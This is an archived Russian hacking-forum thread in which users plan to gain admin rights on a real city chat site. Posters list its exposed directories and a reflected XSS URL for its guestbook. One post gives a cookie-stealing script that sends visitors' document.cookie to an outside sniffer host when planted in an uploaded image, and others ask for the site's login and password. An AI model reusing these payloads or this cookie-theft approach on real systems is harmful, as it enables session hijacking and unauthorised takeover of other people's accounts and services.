Просмотр полной версии : MD3 chat.obninsk.ru
IDentety
15.12.2006, 02:58
Здасте уважаемые античатовцы. вот задался я таким вопросом как поиметь админовские права в нашем городском чате. но сам я не очень разбираюсь в ломке поэтому обьясните как это делаеца для данного чата(тока не ломайте я сам хочу) меня интересует теоретическое описание... заранее спасибо
Немного поползав я нашёл следущее!
http://chat.obninsk.ru/_sys/view/
http://chat.obninsk.ru/design/
http://chat.obninsk.ru/icons/
http://chat.obninsk.ru/bcn/data/
http://chat.obninsk.ru/bcn/data/resize.php
Ещё одна пассивная Xss В гостевой!
http://chat.obninsk.ru/guest.php?sid=%22%3E%22%3Cscript%3Ealert()%3C/script%3E
IDentety
18.12.2006, 04:30
благодарю. + к репе.
InferNo23
18.12.2006, 10:01
Еше можно залить фотографию с содержимым:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
потом кинуть ссылку на картинку и куки придут на снифер, но это только для ИЕ ....
у меня есть скрипт мд чата - могу подогнать ковыряй исходники или ставь себе и ломайй на здоровье
DRON-ANARCHY
13.03.2007, 02:03
неплохо было бы для дальнейшего изучения получить логин и пасс
логин от чего? у меня скрипт могу выложить его если у кого то есть место на фтп
DRON-ANARCHY
15.03.2007, 01:09
нафих твой скрипт... мож там че исправлено или мод или мало еще что. К тому же устанавливать у себя не охота)
ничего не правил- не добавлял- скрипт нужен был для свободной раздачи даного чата- в противовес барыге мд
DRON-ANARCHY
16.03.2007, 00:05
ох.... да я не про твои скрипт говорю. а про то, что установлено на сайте
Underwit
16.03.2007, 02:08
to baga не впадлу дай двигло слить. Буду признателен.
сайт мд.обниск.ру не мой а скрипт я поимел в образовательных целях ) )
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot